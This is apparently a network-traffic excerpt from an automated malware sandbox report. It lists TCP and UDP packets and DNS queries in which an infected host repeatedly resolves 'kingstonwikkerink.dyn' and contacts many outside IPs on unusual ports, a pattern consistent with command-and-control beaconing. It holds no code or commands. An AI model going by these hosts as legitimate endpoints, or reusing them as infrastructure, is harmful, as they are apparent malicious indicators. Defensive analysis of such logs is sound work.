Nov 17, 2024 04:42:08.378665924 CET	10399	55028	81.29.149.178	192.168.2.23
Nov 17, 2024 04:42:08.378767014 CET	55028	10399	192.168.2.23	81.29.149.178
Nov 17, 2024 04:42:08.383793116 CET	10399	55028	81.29.149.178	192.168.2.23
Nov 17, 2024 04:42:13.725775003 CET	43928	443	192.168.2.23	91.189.91.42
Nov 17, 2024 04:42:15.404244900 CET	10788	48442	86.107.100.80	192.168.2.23
Nov 17, 2024 04:42:15.405153036 CET	48442	10788	192.168.2.23	86.107.100.80
Nov 17, 2024 04:42:15.410422087 CET	10788	48442	86.107.100.80	192.168.2.23
Nov 17, 2024 04:42:16.862967968 CET	10399	55028	81.29.149.178	192.168.2.23
Nov 17, 2024 04:42:16.863564968 CET	55028	10399	192.168.2.23	81.29.149.178
Nov 17, 2024 04:42:16.868575096 CET	10399	55028	81.29.149.178	192.168.2.23
Nov 17, 2024 04:42:23.964354992 CET	42836	443	192.168.2.23	91.189.91.43
Nov 17, 2024 04:42:30.107511044 CET	42516	80	192.168.2.23	109.202.202.202
Nov 17, 2024 04:42:30.543199062 CET	40386	5827	192.168.2.23	45.147.200.148
Nov 17, 2024 04:42:30.548043013 CET	5827	40386	45.147.200.148	192.168.2.23
Nov 17, 2024 04:42:30.548156023 CET	40386	5827	192.168.2.23	45.147.200.148
Nov 17, 2024 04:42:30.548252106 CET	40386	5827	192.168.2.23	45.147.200.148
Nov 17, 2024 04:42:30.552994013 CET	5827	40386	45.147.200.148	192.168.2.23
Nov 17, 2024 04:42:30.553051949 CET	40386	5827	192.168.2.23	45.147.200.148
Nov 17, 2024 04:42:30.557892084 CET	5827	40386	45.147.200.148	192.168.2.23
Nov 17, 2024 04:42:31.606635094 CET	5827	40386	45.147.200.148	192.168.2.23
Nov 17, 2024 04:42:31.606812000 CET	40386	5827	192.168.2.23	45.147.200.148
Nov 17, 2024 04:42:31.606920004 CET	40386	5827	192.168.2.23	45.147.200.148
Nov 17, 2024 04:42:31.994025946 CET	33076	13185	192.168.2.23	89.32.41.42
Nov 17, 2024 04:42:31.998936892 CET	13185	33076	89.32.41.42	192.168.2.23
Nov 17, 2024 04:42:31.999038935 CET	33076	13185	192.168.2.23	89.32.41.42
Nov 17, 2024 04:42:31.999078989 CET	33076	13185	192.168.2.23	89.32.41.42
Nov 17, 2024 04:42:32.004332066 CET	13185	33076	89.32.41.42	192.168.2.23
Nov 17, 2024 04:42:32.004400015 CET	33076	13185	192.168.2.23	89.32.41.42
Nov 17, 2024 04:42:32.009296894 CET	13185	33076	89.32.41.42	192.168.2.23
Nov 17, 2024 04:42:37.053663969 CET	47094	15929	192.168.2.23	213.182.204.57
Nov 17, 2024 04:42:37.058629036 CET	15929	47094	213.182.204.57	192.168.2.23
Nov 17, 2024 04:42:37.058721066 CET	47094	15929	192.168.2.23	213.182.204.57
Nov 17, 2024 04:42:37.058760881 CET	47094	15929	192.168.2.23	213.182.204.57
Nov 17, 2024 04:42:37.064208984 CET	15929	47094	213.182.204.57	192.168.2.23
Nov 17, 2024 04:42:37.064285040 CET	47094	15929	192.168.2.23	213.182.204.57
Nov 17, 2024 04:42:37.069122076 CET	15929	47094	213.182.204.57	192.168.2.23
Nov 17, 2024 04:42:40.482094049 CET	13185	33076	89.32.41.42	192.168.2.23
Nov 17, 2024 04:42:40.482424021 CET	33076	13185	192.168.2.23	89.32.41.42
Nov 17, 2024 04:42:40.488408089 CET	13185	33076	89.32.41.42	192.168.2.23
Nov 17, 2024 04:42:45.541275978 CET	15929	47094	213.182.204.57	192.168.2.23
Nov 17, 2024 04:42:45.541662931 CET	47094	15929	192.168.2.23	213.182.204.57
Nov 17, 2024 04:42:45.547370911 CET	15929	47094	213.182.204.57	192.168.2.23
Nov 17, 2024 04:42:46.225580931 CET	54476	16520	192.168.2.23	81.29.149.178
Nov 17, 2024 04:42:46.231951952 CET	16520	54476	81.29.149.178	192.168.2.23
Nov 17, 2024 04:42:46.232101917 CET	54476	16520	192.168.2.23	81.29.149.178
Nov 17, 2024 04:42:46.232140064 CET	54476	16520	192.168.2.23	81.29.149.178
Nov 17, 2024 04:42:46.237085104 CET	16520	54476	81.29.149.178	192.168.2.23
Nov 17, 2024 04:42:46.237215996 CET	54476	16520	192.168.2.23	81.29.149.178
Nov 17, 2024 04:42:46.242089987 CET	16520	54476	81.29.149.178	192.168.2.23
Nov 17, 2024 04:42:50.575122118 CET	38932	3780	192.168.2.23	194.87.30.79
Nov 17, 2024 04:42:50.580054045 CET	3780	38932	194.87.30.79	192.168.2.23
Nov 17, 2024 04:42:50.580152988 CET	38932	3780	192.168.2.23	194.87.30.79
Nov 17, 2024 04:42:50.580198050 CET	38932	3780	192.168.2.23	194.87.30.79
Nov 17, 2024 04:42:50.585136890 CET	3780	38932	194.87.30.79	192.168.2.23
Nov 17, 2024 04:42:50.585199118 CET	38932	3780	192.168.2.23	194.87.30.79
Nov 17, 2024 04:42:50.590738058 CET	3780	38932	194.87.30.79	192.168.2.23
Nov 17, 2024 04:42:51.542742014 CET	3780	38932	194.87.30.79	192.168.2.23
Nov 17, 2024 04:42:51.542794943 CET	3780	38932	194.87.30.79	192.168.2.23
Nov 17, 2024 04:42:51.542983055 CET	38932	3780	192.168.2.23	194.87.30.79
Nov 17, 2024 04:42:51.542983055 CET	38932	3780	192.168.2.23	194.87.30.79
Nov 17, 2024 04:42:51.543031931 CET	38932	3780	192.168.2.23	194.87.30.79
Nov 17, 2024 04:42:51.543205976 CET	3780	38932	194.87.30.79	192.168.2.23
Nov 17, 2024 04:42:51.543282986 CET	38932	3780	192.168.2.23	194.87.30.79
Nov 17, 2024 04:42:54.680082083 CET	43928	443	192.168.2.23	91.189.91.42
Nov 17, 2024 04:42:54.714359045 CET	16520	54476	81.29.149.178	192.168.2.23
Nov 17, 2024 04:42:54.714584112 CET	54476	16520	192.168.2.23	81.29.149.178
Nov 17, 2024 04:42:54.719355106 CET	16520	54476	81.29.149.178	192.168.2.23
Nov 17, 2024 04:42:59.746118069 CET	45040	12125	192.168.2.23	31.13.248.13
Nov 17, 2024 04:42:59.751903057 CET	12125	45040	31.13.248.13	192.168.2.23
Nov 17, 2024 04:42:59.751957893 CET	45040	12125	192.168.2.23	31.13.248.13
Nov 17, 2024 04:42:59.751992941 CET	45040	12125	192.168.2.23	31.13.248.13
Nov 17, 2024 04:42:59.756848097 CET	12125	45040	31.13.248.13	192.168.2.23
Nov 17, 2024 04:42:59.756910086 CET	45040	12125	192.168.2.23	31.13.248.13
Nov 17, 2024 04:42:59.761764050 CET	12125	45040	31.13.248.13	192.168.2.23
Nov 17, 2024 04:43:00.739532948 CET	12125	45040	31.13.248.13	192.168.2.23
Nov 17, 2024 04:43:00.739717007 CET	45040	12125	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:00.739761114 CET	45040	12125	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:06.580559969 CET	38936	3780	192.168.2.23	194.87.30.79
Nov 17, 2024 04:43:06.585599899 CET	3780	38936	194.87.30.79	192.168.2.23
Nov 17, 2024 04:43:06.585694075 CET	38936	3780	192.168.2.23	194.87.30.79
Nov 17, 2024 04:43:06.585736990 CET	38936	3780	192.168.2.23	194.87.30.79
Nov 17, 2024 04:43:06.590729952 CET	3780	38936	194.87.30.79	192.168.2.23
Nov 17, 2024 04:43:06.590816021 CET	38936	3780	192.168.2.23	194.87.30.79
Nov 17, 2024 04:43:06.595740080 CET	3780	38936	194.87.30.79	192.168.2.23
Nov 17, 2024 04:43:07.550632000 CET	3780	38936	194.87.30.79	192.168.2.23
Nov 17, 2024 04:43:07.550950050 CET	38936	3780	192.168.2.23	194.87.30.79
Nov 17, 2024 04:43:07.551050901 CET	38936	3780	192.168.2.23	194.87.30.79
Nov 17, 2024 04:43:15.157394886 CET	42836	443	192.168.2.23	91.189.91.43
Nov 17, 2024 04:43:15.771621943 CET	45044	12125	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:15.776612043 CET	12125	45044	31.13.248.13	192.168.2.23
Nov 17, 2024 04:43:15.776854038 CET	45044	12125	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:15.776942968 CET	45044	12125	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:15.781769991 CET	12125	45044	31.13.248.13	192.168.2.23
Nov 17, 2024 04:43:15.781971931 CET	45044	12125	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:15.787017107 CET	12125	45044	31.13.248.13	192.168.2.23
Nov 17, 2024 04:43:16.773931026 CET	12125	45044	31.13.248.13	192.168.2.23
Nov 17, 2024 04:43:16.773979902 CET	12125	45044	31.13.248.13	192.168.2.23
Nov 17, 2024 04:43:16.774308920 CET	45044	12125	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:16.774310112 CET	45044	12125	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:16.774310112 CET	45044	12125	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:17.604330063 CET	39628	13959	192.168.2.23	103.136.150.114
Nov 17, 2024 04:43:17.609287024 CET	13959	39628	103.136.150.114	192.168.2.23
Nov 17, 2024 04:43:17.609412909 CET	39628	13959	192.168.2.23	103.136.150.114
Nov 17, 2024 04:43:17.609452963 CET	39628	13959	192.168.2.23	103.136.150.114
Nov 17, 2024 04:43:17.614492893 CET	13959	39628	103.136.150.114	192.168.2.23
Nov 17, 2024 04:43:17.614567995 CET	39628	13959	192.168.2.23	103.136.150.114
Nov 17, 2024 04:43:17.619446993 CET	13959	39628	103.136.150.114	192.168.2.23
Nov 17, 2024 04:43:18.953761101 CET	13959	39628	103.136.150.114	192.168.2.23
Nov 17, 2024 04:43:18.954159975 CET	39628	13959	192.168.2.23	103.136.150.114
Nov 17, 2024 04:43:18.954260111 CET	39628	13959	192.168.2.23	103.136.150.114
Nov 17, 2024 04:43:23.987631083 CET	38812	16709	192.168.2.23	89.32.41.42
Nov 17, 2024 04:43:23.992681980 CET	16709	38812	89.32.41.42	192.168.2.23
Nov 17, 2024 04:43:23.992799997 CET	38812	16709	192.168.2.23	89.32.41.42
Nov 17, 2024 04:43:23.992835999 CET	38812	16709	192.168.2.23	89.32.41.42
Nov 17, 2024 04:43:23.997733116 CET	16709	38812	89.32.41.42	192.168.2.23
Nov 17, 2024 04:43:23.997811079 CET	38812	16709	192.168.2.23	89.32.41.42
Nov 17, 2024 04:43:24.003011942 CET	16709	38812	89.32.41.42	192.168.2.23
Nov 17, 2024 04:43:26.822396040 CET	52948	1890	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:26.827450037 CET	1890	52948	31.13.248.13	192.168.2.23
Nov 17, 2024 04:43:26.827533960 CET	52948	1890	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:26.827601910 CET	52948	1890	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:26.832550049 CET	1890	52948	31.13.248.13	192.168.2.23
Nov 17, 2024 04:43:26.832637072 CET	52948	1890	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:26.837584019 CET	1890	52948	31.13.248.13	192.168.2.23
Nov 17, 2024 04:43:27.827838898 CET	1890	52948	31.13.248.13	192.168.2.23
Nov 17, 2024 04:43:27.828197956 CET	52948	1890	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:27.828197956 CET	52948	1890	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:27.830210924 CET	1890	52948	31.13.248.13	192.168.2.23
Nov 17, 2024 04:43:27.830307007 CET	52948	1890	192.168.2.23	31.13.248.13
Nov 17, 2024 04:43:32.479794025 CET	16709	38812	89.32.41.42	192.168.2.23
Nov 17, 2024 04:43:32.480494022 CET	38812	16709	192.168.2.23	89.32.41.42
Nov 17, 2024 04:43:32.485863924 CET	16709	38812	89.32.41.42	192.168.2.23
Nov 17, 2024 04:43:32.859484911 CET	32972	16546	192.168.2.23	89.32.41.42
Nov 17, 2024 04:43:32.864495993 CET	16546	32972	89.32.41.42	192.168.2.23
Nov 17, 2024 04:43:32.864568949 CET	32972	16546	192.168.2.23	89.32.41.42
Nov 17, 2024 04:43:32.864568949 CET	32972	16546	192.168.2.23	89.32.41.42
Nov 17, 2024 04:43:32.869530916 CET	16546	32972	89.32.41.42	192.168.2.23
Nov 17, 2024 04:43:32.869657993 CET	32972	16546	192.168.2.23	89.32.41.42
Nov 17, 2024 04:43:32.874556065 CET	16546	32972	89.32.41.42	192.168.2.23
Nov 17, 2024 04:43:37.512689114 CET	36162	12835	192.168.2.23	193.233.193.45
Nov 17, 2024 04:43:37.517709017 CET	12835	36162	193.233.193.45	192.168.2.23
Nov 17, 2024 04:43:37.517781973 CET	36162	12835	192.168.2.23	193.233.193.45
Nov 17, 2024 04:43:37.517823935 CET	36162	12835	192.168.2.23	193.233.193.45
Nov 17, 2024 04:43:37.522705078 CET	12835	36162	193.233.193.45	192.168.2.23
Nov 17, 2024 04:43:37.522788048 CET	36162	12835	192.168.2.23	193.233.193.45
Nov 17, 2024 04:43:37.527699947 CET	12835	36162	193.233.193.45	192.168.2.23
Nov 17, 2024 04:43:41.339675903 CET	16546	32972	89.32.41.42	192.168.2.23
Nov 17, 2024 04:43:41.340356112 CET	32972	16546	192.168.2.23	89.32.41.42
Nov 17, 2024 04:43:41.345326900 CET	16546	32972	89.32.41.42	192.168.2.23
Nov 17, 2024 04:43:45.992517948 CET	12835	36162	193.233.193.45	192.168.2.23
Nov 17, 2024 04:43:45.993093014 CET	36162	12835	192.168.2.23	193.233.193.45
Nov 17, 2024 04:43:45.998085976 CET	12835	36162	193.233.193.45	192.168.2.23
Nov 17, 2024 04:43:46.371005058 CET	54688	2344	192.168.2.23	91.149.218.232
Nov 17, 2024 04:43:46.376545906 CET	2344	54688	91.149.218.232	192.168.2.23
Nov 17, 2024 04:43:46.376780033 CET	54688	2344	192.168.2.23	91.149.218.232
Nov 17, 2024 04:43:46.376780033 CET	54688	2344	192.168.2.23	91.149.218.232
Nov 17, 2024 04:43:46.382153988 CET	2344	54688	91.149.218.232	192.168.2.23
Nov 17, 2024 04:43:46.382394075 CET	54688	2344	192.168.2.23	91.149.218.232
Nov 17, 2024 04:43:46.387731075 CET	2344	54688	91.149.218.232	192.168.2.23
Nov 17, 2024 04:43:46.965328932 CET	2344	54688	91.149.218.232	192.168.2.23
Nov 17, 2024 04:43:46.965887070 CET	54688	2344	192.168.2.23	91.149.218.232
Nov 17, 2024 04:43:46.971123934 CET	2344	54688	91.149.218.232	192.168.2.23
Nov 17, 2024 04:43:51.090327978 CET	49240	10932	192.168.2.23	45.147.200.148
Nov 17, 2024 04:43:51.095746994 CET	10932	49240	45.147.200.148	192.168.2.23
Nov 17, 2024 04:43:51.095860958 CET	49240	10932	192.168.2.23	45.147.200.148
Nov 17, 2024 04:43:51.096096992 CET	49240	10932	192.168.2.23	45.147.200.148
Nov 17, 2024 04:43:51.101279020 CET	10932	49240	45.147.200.148	192.168.2.23
Nov 17, 2024 04:43:51.101520061 CET	49240	10932	192.168.2.23	45.147.200.148
Nov 17, 2024 04:43:51.106873035 CET	10932	49240	45.147.200.148	192.168.2.23
Nov 17, 2024 04:43:52.069905996 CET	42222	6429	192.168.2.23	103.136.150.114
Nov 17, 2024 04:43:52.075674057 CET	6429	42222	103.136.150.114	192.168.2.23
Nov 17, 2024 04:43:52.076072931 CET	42222	6429	192.168.2.23	103.136.150.114
Nov 17, 2024 04:43:52.076286077 CET	42222	6429	192.168.2.23	103.136.150.114
Nov 17, 2024 04:43:52.081626892 CET	6429	42222	103.136.150.114	192.168.2.23
Nov 17, 2024 04:43:52.082073927 CET	42222	6429	192.168.2.23	103.136.150.114
Nov 17, 2024 04:43:52.087738991 CET	6429	42222	103.136.150.114	192.168.2.23
Nov 17, 2024 04:43:52.183351040 CET	10932	49240	45.147.200.148	192.168.2.23
Nov 17, 2024 04:43:52.183830976 CET	49240	10932	192.168.2.23	45.147.200.148
Nov 17, 2024 04:43:52.184191942 CET	49240	10932	192.168.2.23	45.147.200.148
Nov 17, 2024 04:43:53.432600021 CET	6429	42222	103.136.150.114	192.168.2.23
Nov 17, 2024 04:43:53.433150053 CET	42222	6429	192.168.2.23	103.136.150.114
Nov 17, 2024 04:43:53.433151007 CET	42222	6429	192.168.2.23	103.136.150.114
Nov 17, 2024 04:43:57.241923094 CET	42856	7266	192.168.2.23	209.141.57.98
Nov 17, 2024 04:43:57.246879101 CET	7266	42856	209.141.57.98	192.168.2.23
Nov 17, 2024 04:43:57.246969938 CET	42856	7266	192.168.2.23	209.141.57.98
Nov 17, 2024 04:43:57.247018099 CET	42856	7266	192.168.2.23	209.141.57.98
Nov 17, 2024 04:43:57.251857996 CET	7266	42856	209.141.57.98	192.168.2.23
Nov 17, 2024 04:43:57.251936913 CET	42856	7266	192.168.2.23	209.141.57.98
Nov 17, 2024 04:43:57.256814957 CET	7266	42856	209.141.57.98	192.168.2.23
Nov 17, 2024 04:43:58.230319977 CET	7266	42856	209.141.57.98	192.168.2.23
Nov 17, 2024 04:43:58.230870962 CET	42856	7266	192.168.2.23	209.141.57.98
Nov 17, 2024 04:43:58.230967999 CET	42856	7266	192.168.2.23	209.141.57.98
Nov 17, 2024 04:43:58.491426945 CET	45074	9462	192.168.2.23	193.233.193.45
Nov 17, 2024 04:43:58.496464014 CET	9462	45074	193.233.193.45	192.168.2.23
Nov 17, 2024 04:43:58.496965885 CET	45074	9462	192.168.2.23	193.233.193.45
Nov 17, 2024 04:43:58.496965885 CET	45074	9462	192.168.2.23	193.233.193.45
Nov 17, 2024 04:43:58.501982927 CET	9462	45074	193.233.193.45	192.168.2.23
Nov 17, 2024 04:43:58.502482891 CET	45074	9462	192.168.2.23	193.233.193.45
Nov 17, 2024 04:43:58.507432938 CET	9462	45074	193.233.193.45	192.168.2.23

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 17, 2024 04:41:54.509120941 CET	58803	53	192.168.2.23	80.152.203.134
Nov 17, 2024 04:41:54.658365965 CET	58742	53	192.168.2.23	80.152.203.134
Nov 17, 2024 04:41:54.916501045 CET	53	58803	80.152.203.134	192.168.2.23
Nov 17, 2024 04:41:55.033659935 CET	53	58742	80.152.203.134	192.168.2.23
Nov 17, 2024 04:42:00.874370098 CET	43662	53	192.168.2.23	152.53.15.127
Nov 17, 2024 04:42:00.885332108 CET	53	43662	152.53.15.127	192.168.2.23
Nov 17, 2024 04:42:00.886905909 CET	43293	53	192.168.2.23	185.181.61.24
Nov 17, 2024 04:42:00.920175076 CET	53	43293	185.181.61.24	192.168.2.23
Nov 17, 2024 04:42:02.245269060 CET	43287	53	192.168.2.23	152.53.15.127
Nov 17, 2024 04:42:02.255855083 CET	53	43287	152.53.15.127	192.168.2.23
Nov 17, 2024 04:42:02.257410049 CET	60299	53	192.168.2.23	185.181.61.24
Nov 17, 2024 04:42:02.290584087 CET	53	60299	185.181.61.24	192.168.2.23
Nov 17, 2024 04:42:06.880428076 CET	54680	53	192.168.2.23	194.36.144.87
Nov 17, 2024 04:42:06.890882969 CET	53	54680	194.36.144.87	192.168.2.23
Nov 17, 2024 04:42:06.892664909 CET	45595	53	192.168.2.23	81.169.136.222
Nov 17, 2024 04:42:06.920180082 CET	53	45595	81.169.136.222	192.168.2.23
Nov 17, 2024 04:42:08.328100920 CET	41510	53	192.168.2.23	194.36.144.87
Nov 17, 2024 04:42:08.338671923 CET	53	41510	194.36.144.87	192.168.2.23
Nov 17, 2024 04:42:08.339724064 CET	35506	53	192.168.2.23	81.169.136.222
Nov 17, 2024 04:42:08.367834091 CET	53	35506	81.169.136.222	192.168.2.23
Nov 17, 2024 04:42:20.408404112 CET	44633	53	192.168.2.23	139.84.165.176
Nov 17, 2024 04:42:21.866657019 CET	49743	53	192.168.2.23	139.84.165.176
Nov 17, 2024 04:42:25.415851116 CET	53145	53	192.168.2.23	70.34.254.19
Nov 17, 2024 04:42:26.869582891 CET	39666	53	192.168.2.23	70.34.254.19
Nov 17, 2024 04:42:30.422538042 CET	55717	53	192.168.2.23	65.21.1.106
Nov 17, 2024 04:42:30.449263096 CET	53	55717	65.21.1.106	192.168.2.23
Nov 17, 2024 04:42:30.451415062 CET	58402	53	192.168.2.23	168.235.111.72
Nov 17, 2024 04:42:30.541625977 CET	53	58402	168.235.111.72	192.168.2.23
Nov 17, 2024 04:42:31.875534058 CET	42595	53	192.168.2.23	65.21.1.106
Nov 17, 2024 04:42:31.901845932 CET	53	42595	65.21.1.106	192.168.2.23
Nov 17, 2024 04:42:31.903132915 CET	56653	53	192.168.2.23	168.235.111.72
Nov 17, 2024 04:42:31.992782116 CET	53	56653	168.235.111.72	192.168.2.23
Nov 17, 2024 04:42:36.609117985 CET	55000	53	192.168.2.23	80.152.203.134
Nov 17, 2024 04:42:37.052114010 CET	53	55000	80.152.203.134	192.168.2.23
Nov 17, 2024 04:42:45.485991955 CET	40548	53	192.168.2.23	80.152.203.134
Nov 17, 2024 04:42:46.224534988 CET	53	40548	80.152.203.134	192.168.2.23
Nov 17, 2024 04:42:50.546200037 CET	58410	53	192.168.2.23	217.160.70.42
Nov 17, 2024 04:42:50.573673010 CET	53	58410	217.160.70.42	192.168.2.23
Nov 17, 2024 04:42:56.545763969 CET	44652	53	192.168.2.23	139.84.165.176
Nov 17, 2024 04:42:59.717015982 CET	60682	53	192.168.2.23	217.160.70.42
Nov 17, 2024 04:42:59.744982958 CET	53	60682	217.160.70.42	192.168.2.23
Nov 17, 2024 04:43:01.551654100 CET	40423	53	192.168.2.23	194.36.144.87
Nov 17, 2024 04:43:01.562237978 CET	53	40423	194.36.144.87	192.168.2.23
Nov 17, 2024 04:43:01.563513041 CET	40569	53	192.168.2.23	70.34.254.19
Nov 17, 2024 04:43:05.741280079 CET	56878	53	192.168.2.23	139.84.165.176
Nov 17, 2024 04:43:06.569294930 CET	40712	53	192.168.2.23	152.53.15.127
Nov 17, 2024 04:43:06.579782009 CET	53	40712	152.53.15.127	192.168.2.23
Nov 17, 2024 04:43:10.743099928 CET	48555	53	192.168.2.23	194.36.144.87
Nov 17, 2024 04:43:10.753588915 CET	53	48555	194.36.144.87	192.168.2.23
Nov 17, 2024 04:43:10.754698992 CET	52763	53	192.168.2.23	70.34.254.19
Nov 17, 2024 04:43:12.556917906 CET	46857	53	192.168.2.23	5.161.109.23
Nov 17, 2024 04:43:15.760142088 CET	58048	53	192.168.2.23	152.53.15.127
Nov 17, 2024 04:43:15.770867109 CET	53	58048	152.53.15.127	192.168.2.23
Nov 17, 2024 04:43:17.563357115 CET	56115	53	192.168.2.23	65.21.1.106
Nov 17, 2024 04:43:17.590336084 CET	53	56115	65.21.1.106	192.168.2.23
Nov 17, 2024 04:43:17.592334032 CET	57200	53	192.168.2.23	202.61.197.122
Nov 17, 2024 04:43:17.603362083 CET	53	57200	202.61.197.122	192.168.2.23
Nov 17, 2024 04:43:21.777815104 CET	59050	53	192.168.2.23	5.161.109.23
Nov 17, 2024 04:43:23.958432913 CET	56744	53	192.168.2.23	217.160.70.42
Nov 17, 2024 04:43:23.986334085 CET	53	56744	217.160.70.42	192.168.2.23
Nov 17, 2024 04:43:26.781958103 CET	37657	53	192.168.2.23	65.21.1.106
Nov 17, 2024 04:43:26.808984041 CET	53	37657	65.21.1.106	192.168.2.23
Nov 17, 2024 04:43:26.810915947 CET	35477	53	192.168.2.23	202.61.197.122
Nov 17, 2024 04:43:26.821477890 CET	53	35477	202.61.197.122	192.168.2.23
Nov 17, 2024 04:43:32.831202030 CET	38514	53	192.168.2.23	217.160.70.42
Nov 17, 2024 04:43:32.858580112 CET	53	38514	217.160.70.42	192.168.2.23
Nov 17, 2024 04:43:37.487236977 CET	43972	53	192.168.2.23	152.53.15.127
Nov 17, 2024 04:43:37.497934103 CET	53	43972	152.53.15.127	192.168.2.23
Nov 17, 2024 04:43:37.500428915 CET	36073	53	192.168.2.23	202.61.197.122
Nov 17, 2024 04:43:37.511006117 CET	53	36073	202.61.197.122	192.168.2.23
Nov 17, 2024 04:43:46.345294952 CET	60735	53	192.168.2.23	152.53.15.127
Nov 17, 2024 04:43:46.356339931 CET	53	60735	152.53.15.127	192.168.2.23
Nov 17, 2024 04:43:46.358374119 CET	52554	53	192.168.2.23	202.61.197.122
Nov 17, 2024 04:43:46.369571924 CET	53	52554	202.61.197.122	192.168.2.23
Nov 17, 2024 04:43:51.000273943 CET	37111	53	192.168.2.23	168.235.111.72
Nov 17, 2024 04:43:51.088376045 CET	53	37111	168.235.111.72	192.168.2.23
Nov 17, 2024 04:43:51.971251011 CET	43713	53	192.168.2.23	168.235.111.72
Nov 17, 2024 04:43:52.067214966 CET	53	43713	168.235.111.72	192.168.2.23
Nov 17, 2024 04:43:57.189724922 CET	45914	53	192.168.2.23	65.21.1.106
Nov 17, 2024 04:43:57.216428995 CET	53	45914	65.21.1.106	192.168.2.23
Nov 17, 2024 04:43:57.218456030 CET	46208	53	192.168.2.23	194.36.144.87
Nov 17, 2024 04:43:57.228794098 CET	53	46208	194.36.144.87	192.168.2.23
Nov 17, 2024 04:43:57.230621099 CET	32924	53	192.168.2.23	202.61.197.122
Nov 17, 2024 04:43:57.241039038 CET	53	32924	202.61.197.122	192.168.2.23
Nov 17, 2024 04:43:58.438764095 CET	57173	53	192.168.2.23	65.21.1.106
Nov 17, 2024 04:43:58.465249062 CET	53	57173	65.21.1.106	192.168.2.23
Nov 17, 2024 04:43:58.467087030 CET	41275	53	192.168.2.23	194.36.144.87
Nov 17, 2024 04:43:58.477365971 CET	53	41275	194.36.144.87	192.168.2.23
Nov 17, 2024 04:43:58.479561090 CET	35757	53	192.168.2.23	202.61.197.122
Nov 17, 2024 04:43:58.489933968 CET	53	35757	202.61.197.122	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 17, 2024 04:41:54.509120941 CET	192.168.2.23	80.152.203.134	0xbedb	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:41:54.658365965 CET	192.168.2.23	80.152.203.134	0xbedb	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:00.874370098 CET	192.168.2.23	152.53.15.127	0xb47c	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:00.886905909 CET	192.168.2.23	185.181.61.24	0xcd4b	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:02.245269060 CET	192.168.2.23	152.53.15.127	0xb47c	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:02.257410049 CET	192.168.2.23	185.181.61.24	0xcd4b	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:06.880428076 CET	192.168.2.23	194.36.144.87	0x699	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:06.892664909 CET	192.168.2.23	81.169.136.222	0x7d62	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:08.328100920 CET	192.168.2.23	194.36.144.87	0x699	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:08.339724064 CET	192.168.2.23	81.169.136.222	0x7d62	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:20.408404112 CET	192.168.2.23	139.84.165.176	0x6961	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:21.866657019 CET	192.168.2.23	139.84.165.176	0x6961	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:25.415851116 CET	192.168.2.23	70.34.254.19	0x5c03	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:26.869582891 CET	192.168.2.23	70.34.254.19	0x5c03	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:30.422538042 CET	192.168.2.23	65.21.1.106	0xce3e	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:30.451415062 CET	192.168.2.23	168.235.111.72	0x2ff1	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:31.875534058 CET	192.168.2.23	65.21.1.106	0xce3e	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:31.903132915 CET	192.168.2.23	168.235.111.72	0x2ff1	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:36.609117985 CET	192.168.2.23	80.152.203.134	0x103d	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:45.485991955 CET	192.168.2.23	80.152.203.134	0x103d	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:50.546200037 CET	192.168.2.23	217.160.70.42	0x5339	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:56.545763969 CET	192.168.2.23	139.84.165.176	0xdccf	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:42:59.717015982 CET	192.168.2.23	217.160.70.42	0x5339	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
